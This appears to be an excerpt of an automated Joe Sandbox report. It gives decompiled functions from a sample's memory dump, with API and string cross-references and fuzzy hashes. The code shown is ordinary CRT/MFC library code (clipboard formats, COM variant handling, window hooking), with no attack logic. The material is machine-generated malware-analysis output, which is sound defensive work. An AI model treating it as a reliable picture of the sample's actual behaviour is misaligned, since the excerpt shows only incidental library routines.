__encode_pointer.LIBCMT ref: 00424A75
__encode_pointer.LIBCMT ref: 00424A85
__encode_pointer.LIBCMT ref: 00424A95
__decode_pointer.LIBCMT ref: 00424AB6
__calloc_crt.LIBCMT ref: 00424ACF
__decode_pointer.LIBCMT ref: 00424AE9
__initptd.LIBCMT ref: 00424AF8
GetCurrentThreadId.KERNEL32 ref: 00424AFF

Strings

KERNEL32.DLL, xrefs: 00424997
FlsFree, xrefs: 004249DA
FlsAlloc, xrefs: 004249B8
FlsGetValue, xrefs: 004249C0
FlsSetValue, xrefs: 004249CD

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: 7b02d7ed6b3b6a7ce64f6f14d22585a98f71800e69ec1092eb72b2d7174e1ea0
Instruction ID: 963e8a1070996f63c3d0f3f4c191d7009e08024d37f58c6308c9cc54aea640d7
Opcode Fuzzy Hash: 7b02d7ed6b3b6a7ce64f6f14d22585a98f71800e69ec1092eb72b2d7174e1ea0
Instruction Fuzzy Hash: 13318079740B209BCB116B79BC05B067AA4EB87754B51853BE410B2AA0DF79D480CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD37, Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041CD37(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}

0x0041cd44
0x0041cd4d
0x0041cd56
0x0041cd60
0x0041cd6a
0x0041cd74
0x0041cd7e
0x0041cd88
0x0041cd92
0x0041cd9c
0x0041cda6
0x0041cdb0
0x0041cdb5
0x0041cdbc

APIs

RegisterClipboardFormatA.USER32 ref: 0041CD46
RegisterClipboardFormatA.USER32 ref: 0041CD4F
RegisterClipboardFormatA.USER32 ref: 0041CD59
RegisterClipboardFormatA.USER32 ref: 0041CD63
RegisterClipboardFormatA.USER32 ref: 0041CD6D
RegisterClipboardFormatA.USER32 ref: 0041CD77
RegisterClipboardFormatA.USER32 ref: 0041CD81
RegisterClipboardFormatA.USER32 ref: 0041CD8B
RegisterClipboardFormatA.USER32 ref: 0041CD95
RegisterClipboardFormatA.USER32 ref: 0041CD9F
RegisterClipboardFormatA.USER32 ref: 0041CDA9
RegisterClipboardFormatA.USER32 ref: 0041CDB3

Strings

Link Source Descriptor, xrefs: 0041CD83
Object Descriptor, xrefs: 0041CD79
RichEdit Text and Objects, xrefs: 0041CDAB
ObjectLink, xrefs: 0041CD51
Embedded Object, xrefs: 0041CD5B
Rich Text Format, xrefs: 0041CDA1
Embed Source, xrefs: 0041CD65
Native, xrefs: 0041CD3F
Link Source, xrefs: 0041CD6F
FileNameW, xrefs: 0041CD97
OwnerLink, xrefs: 0041CD48
FileName, xrefs: 0041CD8D

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: fa62fb11877792a06cbeae9f6a028dd3d60365e63ae9067f928d27611659888e
Instruction ID: 185d9513e9e3c8f8d91afcc4ef31229a7346f959b1470ae00d2bb1a9d435a8cc
Opcode Fuzzy Hash: fa62fb11877792a06cbeae9f6a028dd3d60365e63ae9067f928d27611659888e
Instruction Fuzzy Hash: 1E0139B2A447845ACF30AF769C09907BAE0EEC9B10721696FE4C587750D6B8D401DF88

Uniqueness

Uniqueness Score: -1.00%

Function 0041C757, Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 423
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041C757(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E0041F6EA(E0043377E, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E0041F7C2(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E0041F330(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x437058;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 =  *(_t300 - 0x4c) - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if( *(_t300 - 0x4c) == _t257) {
					L37:
					_t295 = 0;
					E0041A7E4(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E0041F330(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x439340, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E0041C700(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E00402F0C(_t257, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E0041B9F7(_t300 - 0x68);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E00402F0C(_t257, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M0041CCE7))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E0040ECBE(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E00403115(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E00402EE1(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E0041C157(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E0040342E(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E0040342E(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E0040342E(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E0041F7F4(_t300 + 0x14, 0x43ef68);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t297 = E00402EE1(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E0041F330(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M0041CC9B))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E0041B66F(_t300 - 0x34, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E0041BA91(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E00402F0C(_t258, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M0041CC4B))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E004036AB(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E00403036(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E004037AF(__ebx, __ecx, __edi, __esi, __eflags);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 0041C75E
_memset.LIBCMT ref: 0041C786
lstrlenA.KERNEL32(?), ref: 0041C796
_memset.LIBCMT ref: 0041C800
_memset.LIBCMT ref: 0041CA16
VariantClear.OLEAUT32(?), ref: 0041CA75
VariantClear.OLEAUT32(?), ref: 0041CA9D
SysStringLen.OLEAUT32(?), ref: 0041CAF7
SysFreeString.OLEAUT32(?), ref: 0041CB17
SysStringLen.OLEAUT32(?), ref: 0041CB1C
SysFreeString.OLEAUT32(?), ref: 0041CB30
SysStringLen.OLEAUT32(?), ref: 0041CB35
SysFreeString.OLEAUT32(?), ref: 0041CB49
__CxxThrowException@8.LIBCMT ref: 0041CB63
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 0041CB81
VariantClear.OLEAUT32(?), ref: 0041CB91

Strings

XpC, xrefs: 0041C7B9

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
String ID: XpC
API String ID: 4128688680-1560596422
Opcode ID: be4c868b454149c2b2600008163556171ca705d1456a4cebcd2cc0c5bfb6c5b4
Instruction ID: 96ace918a2bd9a0f0a8ad0f941851b9479455dd266bf0f0d67035f332fcd63c4
Opcode Fuzzy Hash: be4c868b454149c2b2600008163556171ca705d1456a4cebcd2cc0c5bfb6c5b4
Instruction Fuzzy Hash: 93F19AB1940209DFDF10DFA8CC84AEEBBB5EF05304F14406AE815AB291D7789E92CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B4F5, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040B4F5(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E0041F753(E00432474, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x4037fd);
				 *(_t116 - 0x120) = _t110;
				_t54 = E0040F584(_t94, 0x44642c, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E004037E3(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t55 = E0040DB94(_t94, _t106, _t111, __eflags);
					__eflags = _t111;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x446804;
						if( *0x446804 == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x44640c;
								if( *0x44640c != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x44640c; // 0x8000
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t116 - 0x14) = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E0040B3B1);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E0041F330(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E0040875E(_t94, _t97, _t106, "#32768", __eflags);
								__eflags = _t72;
								 *0x44640c = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E0042158D(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E0040DBE0(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E00409CD8(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E0040A3D5);
							__eflags = _t83 - E0040A3D5;
							if(_t83 != E0040A3D5) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E0040D3B7();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E00403EE9(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E0041F7D6(_t94, _t105, _t110);
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 0040B4FF

Part of subcall function 0040F584: __EH_prolog3.LIBCMT ref: 0040F58B

CallNextHookEx.USER32(?,?,?,?), ref: 0040B543

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

GetClassLongA.USER32 ref: 0040B587
GlobalGetAtomNameA.KERNEL32 ref: 0040B5B1
SetWindowLongA.USER32 ref: 0040B606
_memset.LIBCMT ref: 0040B650
GetClassLongA.USER32 ref: 0040B680
GetClassNameA.USER32(?,?,00000100), ref: 0040B6A1
GetWindowLongA.USER32 ref: 0040B6C5
GetPropA.USER32 ref: 0040B6DF
SetPropA.USER32 ref: 0040B6EA
GetPropA.USER32 ref: 0040B6F2
GlobalAddAtomA.KERNEL32 ref: 0040B6FA
SetWindowLongA.USER32 ref: 0040B708
CallNextHookEx.USER32(?,00000003,?,?), ref: 0040B720
UnhookWindowsHookEx.USER32(?), ref: 0040B734

Strings

#32768, xrefs: 0040B662, 0040B667, 0040B6B1
,dD, xrefs: 0040B50F
AfxOldWndProc423, xrefs: 0040B6D8, 0040B6DD, 0040B6E8, 0040B6F0, 0040B6F9
ime, xrefs: 0040B5BA

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
